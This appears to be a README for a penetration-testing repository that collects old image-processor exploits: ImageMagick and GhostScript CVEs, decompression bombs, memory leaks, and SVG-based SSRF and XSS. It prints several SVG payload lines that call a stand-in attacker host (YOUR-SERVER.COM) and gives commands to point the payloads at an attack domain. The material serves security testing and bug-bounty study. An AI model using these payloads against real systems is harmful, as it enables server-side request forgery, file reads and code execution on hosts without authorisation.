Image Upload Exploits
This repository contains various old image exploits (2016 - 2019) for known vulnerabilities in image processors. This is a compilation of various files/attack vectors/exploits that I use in penetration testing and bug bounty.
Also, you can find some tips, examples, and links to other tools useful for attacks in the related section.
Nothing new. The repository is based on third-party research, BugBounty disclosures, and own experience. All the links to original publications are attached to relevant sections.
If you have more exploits please make a pull request!
Every DNS-based and SSRF exploits have an abstract scheme, hostname, port for resolve, just use these commands to replace all of them. Exploits also have a subdomain (like ssrf-svg-image-href.evil.com) that indicates which bug was triggered.
Replace hostname (for DNS-based and SSRF payloads):
grep -rl 'TARGET_DOMAIN' * | xargs -i@ sed -i 's/TARGET_DOMAIN/your.attack.domain/g' @
Replace scheme (for SSRF payloads):
grep -rl 'TARGET_SCHEME://' * | xargs -i@ sed -i 's/TARGET_SCHEME:\/\//http:\/\//g' @
Replace port (for SSRF payloads):
grep -rl 'TARGET_PORT' * | xargs -i@ sed -i 's/TARGET_PORT/80/g' @
General Tips
- If the target extension is disallowed on the web server - try to change it to allowed extension PNG/JPG/GIF or allowed MIME type. Some image processors recognize the image format by its content. (Most files in this repo have duplicate with .jpg extension)
- Use default SSRF tricks - try to change protocol (e.g.
ftp://
,https://
,file://
or UNC '\\your-domain\share'), port (e.g. 53,22,443) - Create an HTML page on your web server with malicious images and malicious
favicon.ico
, some crawlers/web uploaders may render HTML to some kind of preview, and images will be processed and rendered too.
Cheatsheet
DoS
Pixel Flood
Just a typical data compression bomb. When loaded to memory, it will be unpacked as 4128062500 pixels. Be careful!
Links:
zTXt chunk
Yet another data compression bomb, the exploit uses the special zTXt chunk with zlib compression. Be careful!
Links:
GhostScript
GhostScript is an interpreter for PostScript. PostScript is a type of programming language, and most exploits affect sandboxing in PostScript. Vulnerabilities in GhostScript affect ImageMagick because it uses GhostScript for processing PostScript files like a PDF, EPS, PS, XPS. For sure, if you found an application that handles these file types without ImageMagick, you can also try these exploits.
Exploits
Few various versions with DNS-based and timeout-based payloads, and different extensions:
- Exploits for CVE-2017–8291
- Exploits for CVE-2018-16509
- Exploits for CVE-2019-6116
- Exploits for CVE-2019-14811, CVE-2019-14812, CVE-2019-14813
- Exploits for CVE-2019-10216
Links
MemoryLeaks
Gifoeb (CVE-2017-15277)
Memory leak due to error processing GIF images in ImageMagick. This bug was discovered by Emil Lerner. He also created a PoC that allows you to extract data from the resulting image. This vulnerability is often found in applications that allow you to upload images and then process them, for example, resize. The size of memory leakage is limited to 768 bytes.
You can use 300x300 GIF image file to detect if an application is vulnerable. If vulnerable you will see something like:
then use Emil's PoC to extract memory bytes.
Links
XBM memory leak (CVE-2018-16323)
Memory leak due to error processing XBM images in ImageMagick. Same conditions as in CVE-2017-15277, when web application processes image using ImageMagick, for example, resize. The vulnerability was discovered by Fedotkin Zakhar, who created PoC. The size of memory leakage is unlimited but environment-dependent.
Exploits
- Valid 500x500 XBM image
- Same as above with JPG extension
- 500x500 image with short payload
- Same as above with JPG extension
If the web application is vulnerable, then the result will be similar to something like:
Then try to recover raw bytes using PoC. Or simply use ImageMagick:
convert result1.png result1.xbm
In result1.xbm
you will see raw bytes of memory as part of an array in the XBM image.
Links
SVG
This pretty image format is a vector-based image defined in XML.
SVG Basics
- In SVG you can define links to external resources, so this can lead to SSRF attack or local file read.
- SVG can contain JavaScript code and if content-type in HTTP Response is image/svg+xml JS will be executed.
- XML? XXE!
- If SVG image is rendered to some raster image format (e.g. PNG, JPG, .., etc) then 1 and 3 can lead to interesting results, you can render some text files or images in the resulting image.
Exploits
Some native examples
External image
<image height="100" width="100" xlink:href="http://YOUR-SERVER.COM:80/" />
<feImage xlink:href="http://YOUR-SERVER.COM:80/" width="200" height="200"/>
External stylesheet
<?xml-stylesheet type="text/css" href="http://YOUR-SERVER.COM:80"?>
<style>
@import url(http://YOUR-SERVER.COM:80/);
</style>
External fill source. From HackerOne
<rect fill="url(http://YOUR-SERVER.COM:80)">
Iframe If iframe is rendered then you can try to read files or make arbitrary requests
<foreignObject width="100" height="100">
<iframe src="http://YOUR-SERVER.COM:80"></iframe>
</foreignObject>
External CSS
<style>
@import url(http://YOUR-SERVER.COM:80/);
</style>
SVG tags that include xlink:href attribute
Links
- SSRF via xlink SVG, fingerprinting libraries
- SVGSalamander CVE-2017-5617, Java library for SVG handling
- Another collection of SVG SSRF payloads
- XSS via SVG, Abdullah Hussam Paragon Initiative Enterprises BugBounty
- SSRF via xlink, floyd Shopify BugBounty
- SSRF via fill, Alex Birsan Rockstar Games BugBounty
ImageTragick (CVE-2016–3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)
The most famous bugs in ImageMagick. Vulnerabilities were found by Stewie and Nikolay Ermishkin . It includes RCE, SSRF, File deletion, File moving, and Local file read.
- Exploits – DNS resolve and sleep for timebased checks
Links
GraphicsMagick File Read CVE-2019-12921
The vulnerability in the GraphicsMagick library was found by Fedotkin Zakhar. The bug can be exploited for arbitrary file reading, if an SVG image is rendered then the text file will be rendered in the resulting image too. For exploitation you need to specify the path to some image, it can be a remote path. In case if a remote image is unavailable from the target server you can also check the default images on the target system and use the local path to some image in the exploit.
Links
Shell Injection in ImageMagick CVE-2020-29599
The ImageMagick vulnerability in processing passwords for PDF, however, it is highly likely you will never find this bug, as only a few minor ImageMagick versions are vulnerable.
First of all the SVG structure has an image root tag. As the parser does not enforce that the SVG tag is the root tag, IM has no problems parsing this file as an SVG. The SVG structure specifies an image URL, which uses msl:poc.svg. This tells ImageMagick to load poc.svg with the MSL coder.
Although MSF is an XML-based structure, the MSF coder does not deploy a real XML parser. It only requires that the file starts with a tag it supports. Another trick I used is present in the read tag. It is necessary to target a PDF file to trigger the vulnerability. To bypass this necessity, I specified any known local file and used the pdf: protocol handler to ensure it is treated as a PDF.
- Exploits – DNS resolve and sleep for time-based checks
Links